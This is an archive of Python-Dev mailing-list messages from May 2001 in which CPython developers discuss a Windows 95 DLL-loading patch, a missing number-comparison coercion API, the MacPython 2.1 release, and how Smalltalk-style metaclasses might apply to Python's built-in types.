From MarkH@ActiveState.com  Tue May  1 01:42:19 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;


From thomas@xs4all.net  Tue May  1 09:07:48 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keep your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Tue May  1 11:30:57 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything else than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Tue May  1 22:22:11 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
probelm with the comparison code in Python 2.1. Looking at
the code it seems that one of my original coercion patches
did not make it into the core. I added a new API PyNumber_Compare()
knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack@oratrix.nl  Tue May  1 22:23:59 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as writing large
applications. MacPython offers alot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
unix-compatible cgi-scripting, image-manipulation libraries, numerical
libraries, tk-based machine independent windowing and lots more. It
also uniquely among Pythons allows you to create fully selfcontained
(and, hence, distributable) applications without needing a C compiler
or anything.

New in this version:
- A choice of Carbon or Classic runtime, so runs on anything between
  MacOS 8.1 and MacOS X
- Distutils support for easy installation of extension packages
- BBedit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal and active installer

Please send feedback on this release to pythonmac-sig@python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido@digicool.com  Wed May  2 01:52:29 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalks's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.

Sigh.

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same as Python does.

To illustrate, suppose you have object.method()  (using Python-style
syntax)

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)

I believe Python works roughly as follows (Just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into object.
__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__ , namely object.
__class__.class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it exactly the same lookup mechanism.  So there is no
ambiguity.

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
variable, d.  I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method

I think this is a nice, conceptually simple model.   Things get
interesting, though, when you start to consider how the mechanism of class.
__class__  -- which is the thing that makes class methods no different than
instance methods  -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on a object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object).  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actually hierarchy has a little
more factoring and I changed the names for more clarity).

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instanced is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hieararchy (superclass --
subclass)

plain-class
----------------
<none>
o Class
   o  Object                                                   isInstanceOf
o ObjectMetaClass                     isInstanceOf  MetaClass
        o Class                                                isInstanceOf
o ClassMetaClass                    isInstanceOf  MetaClass
            o MetaClass                                  isInstanceOf
o MetaClassMetaClass      isInstanceOf  MetaClass
        . . .
        o Rectangle                                        isInstanceOf
o RectangleMetaClass          isInstanceOf  MetaClass
            o SpecializedRectangle            isInstanceOf
o SpecializedRectangleMetaClass  isInstanceOf  MetaClass
All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido@digicool.com  Wed May  2 02:29:28 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
 <3AEF2903.79308F55@lemburg.com>
References: <3AEF2903.79308F55@lemburg.com>
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Wed May  2 01:42:15 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido@digicool.com  Wed May  2 02:55:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
 <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com>
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to a explicitly raise a more meaningful exception here
> if __all__ doesnt contain strings?

Definitely.  Be my guest.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed May  2 02:22:47 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc up the inheritance chain.

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Wed May  2 03:48:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
 <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd. ed.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed May  2 03:48:20 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From mal@lemburg.com  Wed May  2 08:59:03 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > probelm with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API PyNumber_Compare()
> > knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as separate
API was to simply shift out code from PyObject_Compare() into
a new function, not so much motivated by some higher level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you elucidate me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons which do have the same problems
with centralized coercion as e.g. __add__ or other binary
operators.

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
